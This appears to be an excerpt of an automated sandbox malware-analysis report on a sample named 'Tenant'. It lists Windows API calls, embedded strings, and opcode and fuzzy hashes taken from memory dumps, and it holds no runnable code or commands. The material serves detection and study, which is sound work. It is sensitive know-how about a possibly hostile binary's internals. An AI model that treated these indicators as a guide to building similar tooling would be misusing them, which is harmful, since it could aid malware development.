                                                                                        • IsWindow.USER32(?), ref: 00AF66BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground_memmove
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 3828923867-1919597938
                                                                                        • Opcode ID: 90412d439a20b51f491b148aec4a9511c2bc75c2af44d8c62043bb442d4d8dc2
                                                                                        • Instruction ID: d0d8504b1b3c693f8ec759344a5b58b20eabc5f5d9d7a482ce80c3c3e98c89a8
                                                                                        • Opcode Fuzzy Hash: 90412d439a20b51f491b148aec4a9511c2bc75c2af44d8c62043bb442d4d8dc2
                                                                                        • Instruction Fuzzy Hash: 7FD1E530104206EFCB08EFA0C691EAAFBB5BF54344F104A5DF956975A2DB30FA59CB91
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B244AC
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B2456C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: bb3fcd27435489c2d5e47cedd353c80b55555d23d65f5fb0f010e6ed986bf3c4
                                                                                        • Instruction ID: ecc0727f662d9b5fee0a92f7ceb2c792b7c99670f5cfaaa4ddc0b6b0a3753625
                                                                                        • Opcode Fuzzy Hash: bb3fcd27435489c2d5e47cedd353c80b55555d23d65f5fb0f010e6ed986bf3c4
                                                                                        • Instruction Fuzzy Hash: 8BA15E302143119FCB14EF60DA51E6AB7E5EF99314F1049A8B8AA5B7E2DF30ED09CB51
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00B156E1
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00B156EC
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B156F7
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00B15702
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00B1570D
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00B15718
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00B15723
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00B1572E
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00B15739
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00B15744
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00B1574F
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00B1575A
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00B15765
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00B15770
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00B1577B
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00B15786
                                                                                        • GetCursorInfo.USER32(?), ref: 00B15796
                                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00B157C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                        • String ID:
                                                                                        • API String ID: 3215588206-0
                                                                                        • Opcode ID: 003c9a024ad3333b505f79881985f461f838e841cc7fdc4113c10ac1679eb30d
                                                                                        • Instruction ID: 273f6371efbb25f56a582bca600d7dcc0a0c4677f98d8796fe553599bf73595f
                                                                                        • Opcode Fuzzy Hash: 003c9a024ad3333b505f79881985f461f838e841cc7fdc4113c10ac1679eb30d
                                                                                        • Instruction Fuzzy Hash: 13416870E04319AADB209FB68C49D6EFFF8EF91B10B10452FE509E7291DAB86540CE61
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFB17B
                                                                                        • __swprintf.LIBCMT ref: 00AFB21C
                                                                                        • _wcscmp.LIBCMT ref: 00AFB22F
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFB284
                                                                                        • _wcscmp.LIBCMT ref: 00AFB2C0
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00AFB2F7
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AFB349
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFB37F
                                                                                        • GetParent.USER32(?), ref: 00AFB39D
                                                                                        • ScreenToClient.USER32(00000000), ref: 00AFB3A4
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFB41E
                                                                                        • _wcscmp.LIBCMT ref: 00AFB432
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00AFB458
                                                                                        • _wcscmp.LIBCMT ref: 00AFB46C
                                                                                          • Part of subcall function 00AC385C: _iswctype.LIBCMT ref: 00AC3864
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        • Opcode ID: 1856e31e0b3bab8419d0d9ff6269f8ad437f060bec44f28be4251e10f5ccdea7
                                                                                        • Instruction ID: 4c100cfd67ee24b0da8fc39d33a4ef46bc17e818f2ec3e42e7ddc4ff898a5c89
                                                                                        • Opcode Fuzzy Hash: 1856e31e0b3bab8419d0d9ff6269f8ad437f060bec44f28be4251e10f5ccdea7
                                                                                        • Instruction Fuzzy Hash: 4EA1DE7122420AAFDB14DFA4C994FBAB7F8FF44351F108619FA99C2191DB30E955CBA0
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00AFBAB1
                                                                                        • _wcscmp.LIBCMT ref: 00AFBAC2
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFBAEA
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00AFBB07
• _wcscmp.LIBCMT ref: 00AFBB25
• _wcsstr.LIBCMT ref: 00AFBB36
• GetClassNameW.USER32(00000018,?,00000400), ref: 00AFBB6E
• _wcscmp.LIBCMT ref: 00AFBB7E
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFBBA5
• GetClassNameW.USER32(00000018,?,00000400), ref: 00AFBBEE
• _wcscmp.LIBCMT ref: 00AFBBFE
• GetClassNameW.USER32(00000010,?,00000400), ref: 00AFBC26
• GetWindowRect.USER32(00000004,?), ref: 00AFBC8F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadIconW.USER32(00000063), ref: 00AFCBAA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AFCBBC
• SetWindowTextW.USER32(?,?), ref: 00AFCBD3
• GetDlgItem.USER32(?,000003EA), ref: 00AFCBE8
• SetWindowTextW.USER32(00000000,?), ref: 00AFCBEE
• GetDlgItem.USER32(?,000003E9), ref: 00AFCBFE
• SetWindowTextW.USER32(00000000,?), ref: 00AFCC04
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AFCC25
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AFCC3F
• GetWindowRect.USER32(?,?), ref: 00AFCC48
• SetWindowTextW.USER32(?,?), ref: 00AFCCB3
• GetDesktopWindow.USER32 ref: 00AFCCB9
• GetWindowRect.USER32(00000000), ref: 00AFCCC0
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AFCD0C
• GetClientRect.USER32(?,?), ref: 00AFCD19
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AFCD3E
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AFCD69
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
APIs
• _memset.LIBCMT ref: 00B2A87E
• DestroyWindow.USER32(?,?), ref: 00B2A8F8
  • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A972
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A994
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A9A7
• DestroyWindow.USER32(00000000), ref: 00B2A9C9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2AA00
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2AA19
• GetDesktopWindow.USER32 ref: 00B2AA32
• GetWindowRect.USER32(00000000), ref: 00B2AA39
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2AA51
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2AA69
  • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
APIs
  • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
• DragQueryPoint.SHELL32(?,?), ref: 00B2CCCF
  • Part of subcall function 00B2B1A9: ClientToScreen.USER32(?,?), ref: 00B2B1D2
  • Part of subcall function 00B2B1A9: GetWindowRect.USER32(?,?), ref: 00B2B248
  • Part of subcall function 00B2B1A9: PtInRect.USER32(?,?,00B2C6BC), ref: 00B2B258
• SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CD38
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2CD43
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2CD66
• _wcscat.LIBCMT ref: 00B2CD96
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2CDAD
• SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CDC6
• SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CDDD
• SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CDFF
• DragFinish.SHELL32(?), ref: 00B2CE06
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2CEF9
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
APIs
• VariantInit.OLEAUT32(00000000), ref: 00B0831A
• VariantCopy.OLEAUT32(00000000,?), ref: 00B08323
• VariantClear.OLEAUT32(00000000), ref: 00B0832F
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B0841D
• __swprintf.LIBCMT ref: 00B0844D
• VarR8FromDec.OLEAUT32(?,?), ref: 00B08479
• VariantInit.OLEAUT32(?), ref: 00B0852A
• SysFreeString.OLEAUT32(?), ref: 00B085BE
• VariantClear.OLEAUT32(?), ref: 00B08618
• VariantClear.OLEAUT32(?), ref: 00B08627
• VariantInit.OLEAUT32(00000000), ref: 00B08665
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
APIs
• CharUpperBuffW.USER32(?,?), ref: 00B24A61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B24AAC
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• GetLocalTime.KERNEL32(?), ref: 00B0E31F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00B0E32F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B0E33B
• __wsplitpath.LIBCMT ref: 00B0E399
• _wcscat.LIBCMT ref: 00B0E3B1
• _wcscat.LIBCMT ref: 00B0E3C3
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0E3D8
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E3EC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E41E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E43F
• _wcscpy.LIBCMT ref: 00B0E44B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B0E48A
Strings
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
                                                                                        • Opcode ID: cdb519079ec4dee5579799a10b73449d9fc25f5bf53067e8469393607a611d75
                                                                                        • Instruction ID: 1750a0a2bc7f5de311db7aec55cc211f23b51b9680bc12225a8de4f9f0f8cb1e
                                                                                        • Opcode Fuzzy Hash: cdb519079ec4dee5579799a10b73449d9fc25f5bf53067e8469393607a611d75
                                                                                        • Instruction Fuzzy Hash: B86147725042059FC710EF60C984A9FB7E8FF89310F04895EF99987291EB35E945CB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B0A2C2
  • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B0A2E3
• __swprintf.LIBCMT ref: 00B0A33C
• __swprintf.LIBCMT ref: 00B0A355
• _wprintf.LIBCMT ref: 00B0A3FC
• _wprintf.LIBCMT ref: 00B0A41A
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 6aa893699216343e4e0e56036286048fa4511ba1f095cd4fdef243023f86817f
• Instruction ID: 251e7b1afa46f20f3497098e2414fbf7b9584cd2815181d8252963fcc1d6518f
• Opcode Fuzzy Hash: 6aa893699216343e4e0e56036286048fa4511ba1f095cd4fdef243023f86817f
• Instruction Fuzzy Hash: C4518172900209AACF14EBE0DE66EEEB7B8EF14340F500195F405721A2EF752F58CB51
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00AEF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B13FF9,00000000), ref: 00B0009A
• LoadStringW.USER32(00000000,?,00AEF8B8,00000001), ref: 00B000A3
  • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
• GetModuleHandleW.KERNEL32(00000000,00B67310,?,00000FFF,?,?,00AEF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B13FF9,00000000,00000001), ref: 00B000C5
• LoadStringW.USER32(00000000,?,00AEF8B8,00000001), ref: 00B000C8
• __swprintf.LIBCMT ref: 00B00118
• __swprintf.LIBCMT ref: 00B00129
• _wprintf.LIBCMT ref: 00B001D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B001E9
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: adb433253301fffa19edd0cfaa33f6c97c09c0692e81ea3b02cf9ffaafa7ff22
• Instruction ID: 2f0b99edbbb7624f2597f2ddd5f8fa9124b2148ce27733aae0da1cbf6f52ba89
• Opcode Fuzzy Hash: adb433253301fffa19edd0cfaa33f6c97c09c0692e81ea3b02cf9ffaafa7ff22
• Instruction Fuzzy Hash: 2D413E72800119AACF14FBE0DEA6EEEB7BCAF14341F5001A5F505B2092EE356F49CB61
APIs
  • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
  • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
• CharLowerBuffW.USER32(?,?), ref: 00B0AA0E
• GetDriveTypeW.KERNEL32 ref: 00B0AA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AB08
  • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 326417ecfa667e176b47f7b1173e1d4811676b7e769f6c47cb80cdc7bcbe9fee
• Instruction ID: e8242fae8d5f24d1833aca53430f74816103644d1ac18248f32dd84bd8cc94ca
• Opcode Fuzzy Hash: 326417ecfa667e176b47f7b1173e1d4811676b7e769f6c47cb80cdc7bcbe9fee
• Instruction Fuzzy Hash: 74514D711043059FC701EF20C991D6AB7E8FF98758F50499DF896572A2DB31EE09CB92
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A852
• __swprintf.LIBCMT ref: 00B0A874
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A8B1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A8D6
• _memset.LIBCMT ref: 00B0A8F5
• _wcsncpy.LIBCMT ref: 00B0A931
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A966
• CloseHandle.KERNEL32(00000000), ref: 00B0A971
• RemoveDirectoryW.KERNEL32(?), ref: 00B0A97A
• CloseHandle.KERNEL32(00000000), ref: 00B0A984
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 19160b27521646db535b77c3fec766877be9c65b967ce8e4ea00c81680c8d274
• Instruction ID: 09852851fa019dafc0ba7e846512292743fb44e5d716b2f7c48fd8d2e62f3218
• Opcode Fuzzy Hash: 19160b27521646db535b77c3fec766877be9c65b967ce8e4ea00c81680c8d274
• Instruction Fuzzy Hash: 6B31817251021AABDB219FA0DC49FEF77BCEF89700F2045E6F509D61A0EB709645CB25
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B2982C,?,?), ref: 00B2C0C8
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0DF
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0EA
• CloseHandle.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0F7
• GlobalLock.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C100
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C10F
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C118
• CloseHandle.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C11F
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C130
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00B33C7C,?), ref: 00B2C149
• GlobalFree.KERNEL32(00000000), ref: 00B2C159
• GetObjectW.GDI32(00000000,00000018,?), ref: 00B2C17D
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B2C1A8
• DeleteObject.GDI32(00000000), ref: 00B2C1D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B2C1E6
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 34f03f8bcdd9cda3c163db887b9c1121fc337d5ab822530a45654d195423fca4
• Instruction ID: 41f5ab24d5b261d49c3e94036791aaed6009d7fe30893ad194b497bc853f9e06
• Opcode Fuzzy Hash: 34f03f8bcdd9cda3c163db887b9c1121fc337d5ab822530a45654d195423fca4
• Instruction Fuzzy Hash: C8413B75640218EFDB21AF65DC88EAF7BB8EF89711F204098F909E7260DB319D41DB60
APIs
  • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C8A4
• GetFocus.USER32 ref: 00B2C8B4
• GetDlgCtrlID.USER32(00000000), ref: 00B2C8BF
• _memset.LIBCMT ref: 00B2C9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2CA15
• GetMenuItemCount.USER32(?), ref: 00B2CA35
• GetMenuItemID.USER32(?,00000000), ref: 00B2CA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2CA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2CAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2CAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2CB31
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
